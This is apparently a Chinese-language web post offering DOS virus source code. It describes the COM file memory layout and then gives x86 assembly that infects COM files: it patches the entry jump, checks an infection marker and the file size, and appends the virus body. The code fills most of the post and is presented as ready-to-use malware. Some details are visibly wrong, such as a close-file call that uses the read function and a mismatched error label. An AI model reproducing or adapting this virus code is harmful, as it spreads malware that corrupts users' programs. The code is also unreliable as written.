感染com病毒源码
COM文件是纯粹代码映象,加载后在内存中的映象如下:
CS=DS=ES=SS
CS:0000->+----------+
| PSP |
IP(0100)->+----------+
| COM FILE |
SP(FFFE)->+----------+
| dw 0000 |
+----------+
因此COM文件的最大SIZE为 64K-100h bytes - 1 word
感染COM的典型做法如下:
cs:0100 jmp endoffile ;db 0e9h
;dw size of com file
...
endoffile:
virusstart:
virus code
mov ax,orgcode
mov [100],ax
mov al,[orgcode+2]
mov [102],al
virussize=$-virusstart
resume:
jmp 100 ;db 0e9h
;dw -(sizeofcom+virussize)
orgcode db 3 dup (?) ;由原文件由0100开始的三个字节
感染文件,先将开始的三字节保存在orgcode中,然后更改为0E9H,SIZEOFCOMFILE.
将resume开始的三字节改为0E9H,-(sizeofcom+virussize).将病毒写入com文件的末尾.
(是不是很简单^_^).
完整的感染代码还需要有已感染的判断,和文件大小的判断.如下:
假设DS:DX指向文件名VirusSize,VirusStart的定义如上.并以下的修改:
保存开始的四个字节用
db 90h,0E9h
dw sizeofcom
替换,以0E990h为感染标记
...
mov ax,3d01h
int 21h ;open for r/w
jc OpenError
push dx
xchg ax,bx
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h ;seek to end
or dx,dx
jnz complete ;file larger than 64k,donot infect
cmp ax,0FEEEh-VirusSize-11
jnb complete ;com file too large for infect
cmp ax,4
jb complete ;file less than 4 bytes,donot infected
mov di,offset orgcode
mov [di+6],ax
add [di+6],VirusSize ;generate code to replace
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h ;seek to begin
mov cx,4
mov dx,di
mov ah,3fh
int 21h ;read 4 bytes
jc complete
cmp word ptr [di],0E990h
;if has been infected,should be
;nop
;jmp XXXX
jz complete
mov cx,4
add dx,cx
mov ah,40h
int 21h ;write 4 byte to the beginning
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h ;seek to end
mov ah,40h
mov dx,VirusStart
mov cx,VirusSize+11
int 21h ;write Virus Code to COM
complete:
mov ah,3fh
int 21h ;close file
ErrorOpen:
评论